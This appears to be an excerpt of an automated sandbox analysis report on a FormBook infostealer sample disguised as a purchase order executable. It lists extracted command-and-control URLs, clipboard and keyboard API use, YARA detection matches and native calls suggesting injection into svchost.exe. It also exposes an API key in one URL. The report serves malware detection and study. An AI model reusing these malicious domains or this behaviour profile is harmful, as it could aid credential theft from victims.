          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6282.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9net88.net
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9net88.net/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9net88.net/ge07/www.ecurityemployment.today
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9net88.netReferer:
          Source: explorer.exe, 00000003.00000002.3297093239.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2061877271.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095137510.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2061877271.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dvle-father.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dvle-father.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dvle-father.xyz/ge07/www.f7y2i9fgm.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dvle-father.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecurityemployment.today
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecurityemployment.today/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecurityemployment.today/ge07/www.wner-nyquh.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecurityemployment.todayReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.epehr.pics
          Source: explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.epehr.pics/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.epehr.picsReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.f7y2i9fgm.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.f7y2i9fgm.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.f7y2i9fgm.xyz/ge07/www.giyztm.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.f7y2i9fgm.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g18q11a.top
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g18q11a.top/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g18q11a.top/ge07/www.rowadservepros.net
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g18q11a.topReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyz/ge07/www.oal-ahzgwo.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shop
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shop/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shop/ge07/www.zoc-marriage.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shopReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oal-ahzgwo.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oal-ahzgwo.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oal-ahzgwo.xyz/ge07/www.epehr.pics
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oal-ahzgwo.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ostcanadantpl.top
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ostcanadantpl.top/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ostcanadantpl.top/ge07/www.rkgexg.top
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ostcanadantpl.topReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rkgexg.top
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rkgexg.top/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rkgexg.top/ge07/www.9net88.net
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rkgexg.topReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.net
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.net/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.net/ge07/www.dvle-father.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.netReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sfmoreservicesllc.lat
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sfmoreservicesllc.lat/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sfmoreservicesllc.lat/ge07/www.6282.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sfmoreservicesllc.latReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wner-nyquh.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wner-nyquh.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wner-nyquh.xyz/ge07/www.lasterdeals.shop
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wner-nyquh.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyz/ge07/www.g18q11a.top
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyzReferer:
          Source: explorer.exe, 00000003.00000002.3296660560.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2061373249.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3098294743.000000000C513000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000003.00000002.3289689202.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095465738.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2057742779.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000000.2059543443.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291923932.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000000.2057742779.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3289689202.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000003.3095718629.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2056323790.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3287820322.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
          Source: explorer.exe, 00000003.00000000.2059543443.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3292694913.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000000.2059543443.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3292694913.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000003.00000000.2061373249.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3296359647.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000003.00000002.3291923932.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
          Source: explorer.exe, 00000003.00000002.3291923932.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Purchase order MIPO2425110032.exe PID: 2520, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 1396, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: ipconfig.exe PID: 6000, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: Purchase order MIPO2425110032.exe
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A320 NtCreateFile,2_2_0041A320
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A3D0 NtReadFile,2_2_0041A3D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A450 NtClose,2_2_0041A450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A500 NtAllocateVirtualMemory,2_2_0041A500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A31D NtCreateFile,2_2_0041A31D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A44A NtClose,2_2_0041A44A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_03872BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B60 NtClose,LdrInitializeThunk,2_2_03872B60
